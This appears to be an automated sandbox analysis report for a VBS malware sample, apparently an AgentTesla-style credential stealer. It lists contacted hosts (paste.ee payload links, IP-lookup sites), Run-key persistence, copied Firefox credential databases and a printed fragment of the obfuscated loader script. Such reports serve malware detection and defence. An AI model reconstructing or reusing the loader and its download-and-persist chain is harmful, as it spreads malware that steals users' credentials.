https://www.office.com/	AddInProcess32.exe, 00000009.00000002.1681596776.00000000034CE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.0000000003054000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000030C2000.00000004.00000800.00020000.00000000.sdmp, tmpE8C2.tmp.dat.9.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.dr	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000005.00000002.1706558041.0000021CD9113000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://paste.ee/d/3dasY$	wscript.exe, 00000000.00000003.1408406314.00000260C4BEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1409759305.00000260C4BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4BF4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000005.00000002.1706558041.0000021CD9113000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l	tmpB97.tmp.dat.9.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com;	wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.dr	false	Avira URL Cloud: safe	unknown
https://www.office.com/Office	tmpE8C2.tmp.dat.9.dr	false	Avira URL Cloud: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	cert9.db.9.dr	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hT	AddInProcess32.exe, 00000009.00000002.1681596776.00000000031EF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	cert9.db.9.dr	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	tmpB97.tmp.dat.9.dr	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000005.00000002.1706558041.0000021CD9113000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.office.com/LR	AddInProcess32.exe, 00000009.00000002.1681596776.00000000034CE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.dr	false	URL Reputation: safe	unknown
https://paste.ee/_	wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://uploaddeimagens.com.br	powershell.exe, 00000005.00000002.1706558041.0000021CD9113000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://paste.ee/d/3dasYz	wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	cert9.db.9.dr	false	Avira URL Cloud: safe	unknown
https://analytics.paste.ee;	wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000003.00000002.1937420985.000001E4CFD12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1706558041.0000021CD8EF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org	tmpB97.tmp.dat.9.dr	false	Avira URL Cloud: safe	unknown
http://whatismyipaddressnow.co	AddInProcess32.exe, 00000009.00000002.1681596776.00000000030DC000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.dr	false	URL Reputation: safe	unknown
https://paste.ee/H	wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://themes.googleusercontent.com	wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://whatismyipaddressnow.co	AddInProcess32.exe, 00000009.00000002.1681596776.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000030DC000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	true
188.114.97.3	paste.ee	European Union	13335	CLOUDFLARENETUS	true
188.114.96.3	whatismyipaddressnow.co	European Union	13335	CLOUDFLARENETUS	false
104.16.185.241	icanhazip.com	United States	13335	CLOUDFLARENETUS	false
93.123.39.71	unknown	Bulgaria	43561	NET1-ASBG	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1457271
Start date and time:	2024-06-14 15:14:01 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Order Inquiry.vbs
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winVBS@21/25@6/5
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 266 Number of non-executed functions: 9
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7772 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
09:15:03	API Interceptor	42x Sleep call for process: powershell.exe modified
09:15:17	API Interceptor	79x Sleep call for process: AddInProcess32.exe modified
15:15:13	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path \\tsclient\C\Program Files\aburrar.vbs
15:15:21	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path \\tsclient\C\Program Files\aburrar.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	cotizaci#U00f2n.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	lista de cotizaciones.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	rIlzbkxg.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	rcotizaci__n.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	QUOTATION_JUNQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	JUSTIFICANTE PAGO FACTURA.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	Shipping Documents.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	NEW ORDER.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	SOA APRIL.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	rOrdendecompra_pdf__________________________.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	cotizaci#U00f2n.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	lista de cotizaciones.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	rIlzbkxg.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	rcotizaci__n.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	QUOTATION_JUNQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	JUSTIFICANTE PAGO FACTURA.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	Shipping Documents.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	NEW ORDER.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	SOA APRIL.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	rOrdendecompra_pdf__________________________.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
paste.ee	cotizaci#U00f2n.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.96.3
	lista de cotizaciones.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.97.3
	Purchase Enquiry #PO-240902.js	Get hash	malicious	Unknown	Browse	188.114.97.3
	xxh1GZYmD2.rtf	Get hash	malicious	Unknown	Browse	188.114.97.3
	Specifications.js	Get hash	malicious	Unknown	Browse	188.114.96.3
	cotizaci#U00f2n.xlam.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3
	Specifications.vbs	Get hash	malicious	Unknown	Browse	188.114.96.3
	Contract 11-06-24.xls	Get hash	malicious	Unknown	Browse	188.114.96.3
	DHL AWB# 7954365.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	G0000663.xls	Get hash	malicious	Unknown	Browse	188.114.96.3
uploaddeimagens.com.br	cotizaci#U00f2n.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.97.3
	lista de cotizaciones.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.97.3
	Purchase Enquiry #PO-240902.js	Get hash	malicious	Unknown	Browse	188.114.97.3
	Specifications.js	Get hash	malicious	Unknown	Browse	188.114.97.3
	cotizaci#U00f2n.xlam.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3
	Specifications.vbs	Get hash	malicious	Unknown	Browse	188.114.96.3
	Contract 11-06-24.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	DHL AWB# 7954365.xls	Get hash	malicious	Unknown	Browse	188.114.97.3
	G0000663.xls	Get hash	malicious	Unknown	Browse	188.114.96.3
	rF5MD.js	Get hash	malicious	Unknown	Browse	188.114.96.3
whatismyipaddressnow.co	171820386548cbbea4ed1903ede58ab5c6cfb71df0faa52822ed84c4f21b423dbf37ee3c0d777.dat-decoded.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	188.114.97.3
	Purchase Order Enquiry #PO-240902.js	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	188.114.96.3
	Purchase Order Enquiry #PO-240902.vbs	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	188.114.96.3
	aou.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	188.114.97.3
	opp.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	188.114.96.3
	RFQ.js	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	188.114.96.3
	14posdLrGh.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	172.67.143.245
	RFQ-M310 .exe	Get hash	malicious	GuLoader, PXRECVOWEIWOEI Stealer	Browse	172.67.143.245
	file.exe	Get hash	malicious	GuLoader, PXRECVOWEIWOEI Stealer	Browse	172.67.143.245
	file.exe	Get hash	malicious	GuLoader, PXRECVOWEIWOEI Stealer	Browse	104.21.71.78

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	cotizaci#U00f2n.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.96.3
	PAYMENT SLIP 14-06-2024.xlam.xlsx	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.17.96.13
	lista de cotizaciones.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.97.3
	Purchase Enquiry #PO-240902.js	Get hash	malicious	Unknown	Browse	188.114.97.3
	Scanned file 1. Trip to Kenya.xlam.xlsx	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	Updated contract doc.one	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3
	QUOTATION_JUNQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	188.114.97.3
	https://we.tl/t-wde73b4qxt	Get hash	malicious	Unknown	Browse	172.64.151.101
	245087609-050738-sanlccjavap0003-1240_pdf .exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	http://misprogramaspc.com/itoolab-watsgo	Get hash	malicious	Unknown	Browse	104.17.25.14
CLOUDFLARENETUS	cotizaci#U00f2n.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.96.3
	PAYMENT SLIP 14-06-2024.xlam.xlsx	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.17.96.13
	lista de cotizaciones.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.97.3
	Purchase Enquiry #PO-240902.js	Get hash	malicious	Unknown	Browse	188.114.97.3
	Scanned file 1. Trip to Kenya.xlam.xlsx	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	Updated contract doc.one	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3
	QUOTATION_JUNQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	188.114.97.3
	https://we.tl/t-wde73b4qxt	Get hash	malicious	Unknown	Browse	172.64.151.101
	245087609-050738-sanlccjavap0003-1240_pdf .exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	http://misprogramaspc.com/itoolab-watsgo	Get hash	malicious	Unknown	Browse	104.17.25.14
TUT-ASUS	cotizaci#U00f2n.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	lista de cotizaciones.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	rIlzbkxg.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	rcotizaci__n.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	QUOTATION_JUNQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	JUSTIFICANTE PAGO FACTURA.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	Shipping Documents.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	NEW ORDER.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	SOA APRIL.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	rOrdendecompra_pdf__________________________.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	MV WADI S PARTICULARS.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Commodity Details.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Vessel Information.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Office Suppliers Order.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Particulars.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Win32.TrojanX-gen.29327.20826.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	171820386548cbbea4ed1903ede58ab5c6cfb71df0faa52822ed84c4f21b423dbf37ee3c0d777.dat-decoded.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	188.114.96.3
	Purchase Order Enquiry #PO-240902.js	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	188.114.96.3
	Purchase Order Enquiry #PO-240902.vbs	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	188.114.96.3
	Invoice Packing List.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	Purchase Enquiry #PO-240902.js	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	QUOTATION_JUNQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	188.114.97.3 188.114.96.3
	245087609-050738-sanlccjavap0003-1240_pdf .exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	188.114.97.3 188.114.96.3
	http://misprogramaspc.com/itoolab-watsgo	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	DriverAutomationTool (2).ps1	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	DriverAutomationTool.ps1	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	https://jenniferwelsh.com	Get hash	malicious	Unknown	Browse	188.114.97.3 188.114.96.3
	RlwD08ogvR.exe	Get hash	malicious	DCRat	Browse	188.114.97.3 188.114.96.3
	Disparat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	188.114.97.3 188.114.96.3
	Shipping Documents.exe	Get hash	malicious	AgentTesla	Browse	188.114.97.3 188.114.96.3
37f463bf4616ecd445d4a1937da06e19	Purchase Enquiry #PO-240902.js	Get hash	malicious	Unknown	Browse	188.114.97.3
	n3ydjVzUYm.exe	Get hash	malicious	CryptOne, Vidar	Browse	188.114.97.3
	xloader.exe	Get hash	malicious	FormBook, GuLoader	Browse	188.114.97.3
	CamScanner0079.jpg.pif.exe	Get hash	malicious	GuLoader	Browse	188.114.97.3
	Disparat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	188.114.97.3
	qiHXXzgR6f.exe	Get hash	malicious	Vidar	Browse	188.114.97.3
	#U0625#U064a#U0635#U0627#U0644 #U0627#U0644#U062f#U0641#U0639.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	188.114.97.3
	file.exe	Get hash	malicious	PureLog Stealer, Vidar, zgRAT	Browse	188.114.97.3
	file.exe	Get hash	malicious	PureLog Stealer, Vidar, zgRAT	Browse	188.114.97.3
	jWtjLls2ZA.exe	Get hash	malicious	PureLog Stealer, Vidar, zgRAT	Browse	188.114.97.3

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1616
Entropy (8bit):	5.346184626026755
Encrypted:	false
SSDEEP:	48:MxHKlYHKh3oPtHo6hAHKzePHcHHHKAHKx1qHxLHVHj:iqlYqh3oPtI6eqzG8nqAqxwRL1D
MD5:	35691637EEF06C3561696DC72CB1281C
SHA1:	BD00A3772D8C98F3318B3CEB8A85AFAA79252B80
SHA-256:	E7C8BB0ED4357F81D6B6FAD015E6767834D693336C561F45ACCFB7B99614B266
SHA-512:	F29AC88B0F592CF26E7B0F6EBC1D0FDE3DAA02F8FCE9D2BF632E6823EC5AA0BA4D6CD2AB801424EF1578E947F00BD1B20A7175B45DFC20A28A317906EAB2FA24
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Managemen

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\3dasY[1].txt

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with very long lines (11457), with CRLF line terminators
Category:	dropped
Size (bytes):	13771
Entropy (8bit):	4.688734205600574
Encrypted:	false
SSDEEP:	384:btmLndV4uQ1Qxfl4YpSd+mMMG9G03XVB8H+4yRylVpPgRHVHzvsRnZZ+kOi:iVPkQfllSg3MGs03XVBTLWVgHSCkn
MD5:	06087157AEEB6BC457DC48D172E436A2
SHA1:	A44A440729975DAA0A720692E49797E127E8B0D5
SHA-256:	B463AF4A4D68590AD381817E1FDD554A2F6194A804889107B0007F739C471E2A
SHA-512:	70873E44939258ED456BE90FD57383AE2B82F8A735061F2922B7E304F6A644A0A8F16B2C474BEB0CCAAD037EE1270358D93D957B21EB2DBD589B890D95458C32
Malicious:	false
Preview:	.. dim posteridade , subface , berlinense , malhorquino , dionina , Cama , dionina1.. subface = " ".. berlinense = "" & malhorquino & subface & malhorquino & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & malhorquino & subface & malhorquino & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & malhorquino & subface & malhorquino & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & malhorquino & subface & malhorquino & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & malhorquino & subface & malhorquino & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & malhorquino & subface & malhorquino & "QBuDgTreHQDgTreOwDgTregDg

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulN7rlz:NllU
MD5:	60800FE3EBA2CA09118A33A34BF00BD8
SHA1:	4DBA1472443F1B047803693393F61A2182695D2A
SHA-256:	D85FCEE5CD239F2EE739F27980E9EBB1BE0573405BC7C004DB4E828D1A2D50A0
SHA-512:	AFD4B6861BD4A06C23FEC68375FD4B012E8A456ED8EEF708B3F50C6FCD40D7B599B9967EDCFF9E917F9B8BF567ED2B6C5B7EE83AA2F6965A6D02BB1DABB9010F
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\24a4ohrz.default-release\cert9.db

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 7, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	229376
Entropy (8bit):	0.6434294034339584
Encrypted:	false
SSDEEP:	384:A1zkVmvQhyn+Zoz67wNlvMM4333JCN87/LKX15kuv:AhjMmCqR
MD5:	515AEBFD1A85F4A59C3009D04D95D765
SHA1:	67593344CBEF68DB6F90AD02E4FB658036455FAF
SHA-256:	8FD38413C29B8801CF5C5C13027786907F4D3D2F03CB5ADC25BF43B860D13DF0
SHA-512:	CAFB98EB2573E6898DC00F23B683F576C6852EEB99C135FBF27045932E0DBBF749159EA13876718CAEA7C06960762CEADCF2307F66DFA7CB9A88AB1EA2E1CE8B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......z..{...{.{j{*z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\24a4ohrz.default-release\key4.db

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	0.08432026317203951
Encrypted:	false
SSDEEP:	192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vD:51zkVmvQhyn+Zoz67+
MD5:	C444D5B9503F9CCFA9750AB3D51848E9
SHA1:	FFF755261E04C7502AF2F172DE3752D9458100FE
SHA-256:	66EA7282C9A15E75F5F52CB5D745FD1B4830045EB70D99AB4F07744A67E0879E
SHA-512:	E22CC4F41EC10146718E2767B68DCB20CF02AEC55DA8686988A16350045D6A31B9CDF16B7329EE436E9DBF1795699809819FEC2E7D9D460B046FAEC65BC48334
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

